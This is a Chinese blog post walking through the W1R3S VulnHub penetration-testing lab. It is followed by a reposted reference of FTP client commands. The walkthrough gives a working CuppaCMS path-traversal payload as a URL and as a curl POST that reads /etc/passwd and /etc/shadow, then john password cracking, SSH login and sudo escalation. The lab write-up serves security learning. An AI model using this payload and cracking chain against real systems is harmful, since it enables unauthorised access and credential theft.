W1R3S渗透测试vulnhub(学习一下ftp)

文章描述了在NAT模式下,如何使用nmap进行网络扫描,发现靶机并收集信息。通过FTP匿名访问找到可能的漏洞,利用dirb进行目录扫描,发现管理员和WordPress目录。接着,通过WhatWeb识别出CuppaCMS内容管理系统,并利用exploit获取passwd文件。然后,解析shadow文件,使用john进行密码破解,最终通过SSH登录并进行提权操作以获取flag。
摘要由CSDN通过智能技术生成

  靶机与kali都为NAT模式

kali的IP:192.168.182.130

靶机IP:192.168.180.135

1.确定目标

nmap -sP 192.168.182.130/24

 确定靶机ip:192.168.182.135

2.信息收集

nmap -sS -sV -T5 -A -p- 192.168.182.135

 21 FTP协议(可以匿名访问)
22 SSH
80 http
3306 mysql

先访问ftp,不需要密码

ftp 192.168.182.135

输入用户名anonymous

密码为空

 把三个txt文件下载下来

 vim 01.txt

vim 02.txt

解密后没有发现

vim 03.txt

看来ftp渗透可能性不大

目录扫描: dirb http://192.168.182.135/

发现有administrator和wordpress目录

 指纹识别 whatweb 

发现是Title[Cuppa CMS]框架!CuppaCMS是一套内容管理系统(CMS)!
searchsploit cuppa cms

 放到桌面查看

看到提供了几个exp,选择一个: 

 http://target/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

target换成目标ip

尝试post方式

Linux中curl是一个利用URL规则在命令行下工作的文件传输工具

-s:静音模式。不输出任何东西

-data-urlencode:先对数据进行URL编码,再发送给HTTP服务器,即对表单中的字段中进行URL编码后在发送。

使用curl命令提交Post请求: curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.182.135/administrator/alerts/alertConfigField.php

成功得到目标主机的passwd文件内容 

 

 看到用户名w1r3s

shadow文件解析:

文件的格式为:

{用户名}:{加密后的口令密码}:{口令最后修改时间距原点(1970-1-1)的天数}:{口令最小修改间隔(防止修改口令,如果时限未到,将恢复至旧口令):{口令最大修改间隔}:{口令失效前的警告天数}:{账户不活动天数}:{账号失效天数}:{保留}

其中{加密后的口令密码}的格式为\$id\$salt\$encrypted

id为1时,采用md5算法加密

id为5时,采用SHA256算法加密

id为6时,采用SHA512算法加密

salt为盐值,是对密码进行hash的一个干扰值

encrypted为散列值

把passwd改成shadow

 

因为是加密存储的,所以需要使用john,进行密码破解。

将上面查询到的用户密码存在一个文件里

 得到密码computer

ssh登录

提权

sudo -l

sudo su

获取flag

 

 

 

1. 登录FTP服务器
方法一:直接输入ftp加ip地址ftp 192.168.10.xxx
方法二:直接输入ftp,进入ftp服务后输入open加ip地址open 192.168.10.xxx
当连接成功后会让你进行身份验证,在输入密码时屏幕上没有任何显示,不用管,直接输完密码敲回车键即可。

2. 查看FTP服务器上的文件
(一般情况下用户都会被限制目录的访问权限,只可在当前目录下进行操作)
dir:显示服务器目录和文件列表
ls:显示服务器简易的文件列表
cd:进入服务器指定的目录

dir命令可以使用通配符“”和“?”,比如,显示当前目录中所有扩展名为jpg的文件,可使用命令 dir .jpg。

cd命令中必须带目录名。比如 cd main 表示进入当前目录下的main子目录

3. 下载文件
上传和下载文件时应该使用正确的传输类型,FTP的传输类型分为ASCII码方式和二进制方式两种,对.txt、.htm等文件应采用ASCII码方式传输,对.exe或图片、视频、音频等文件应采用二进制方式传输。在默认情况下,FTP为ASCII码传输方式。
type:查看当前的传输方式
ascii:设定传输方式为ASCII码方式
binary:设定传输方式为二进制方式
(以上命令都不带参数)
get:下载指定文件get filename [newname](filename为下载的FTP服务器上的文件名,newname为保存在本都计算机上时使用的名字,如果不指定newname,文件将以原名保存。

get命令下载的文件将保存在本地计算机的工作目录下。该目录是启动FTP时在盘符C:后显示的目录。如果想修改本地计算机的工作目录,可以使用 lcd 命令。比如:lcd d:\ 表示将工作目录设定为D盘的根目录。

mget:下载多个文件mget filename [filename ....](mget命令支持通配符“”和“?”,比如:mget .mp3 表示下载FTP服务器当前目录下的所有扩展名为mp3的文件。)

4. 上传文件
put:上传指定文件put filename [newname]
send:上传指定文件send filename [newname]
(filename为上传的本地文件名,newname为上传至FTP服务器上时使用的名字,如果不指定newname,文件将以原名上传。)

上传文件前,应该根据文件的类型设置传输方式,本机的工作目录也应该设置为上传文件所在的目录。

这里的send和put方法用法都基本相同,但是上传速度send却要比put快很多,有兴趣的人可以去研究下。
5. 结束并退出FTP
close:结束与服务器的FTP会话
quit:结束与服务器的FTP会话并退出FTP环境
6. 其它FTP命令
pwd:查看FTP服务器上的当前工作目录
rename filename newfilename:重命名FTP服务器上的文件
deletefilename:删除FTP服务器上的文件
help[cmd]:显示FTP命令的帮助信息,cmd是命令名,如果不带参数,则显示所有FTP命令
————————————————
版权声明:本文为CSDN博主「luckycyong」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_38526635/article/details/82147980

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值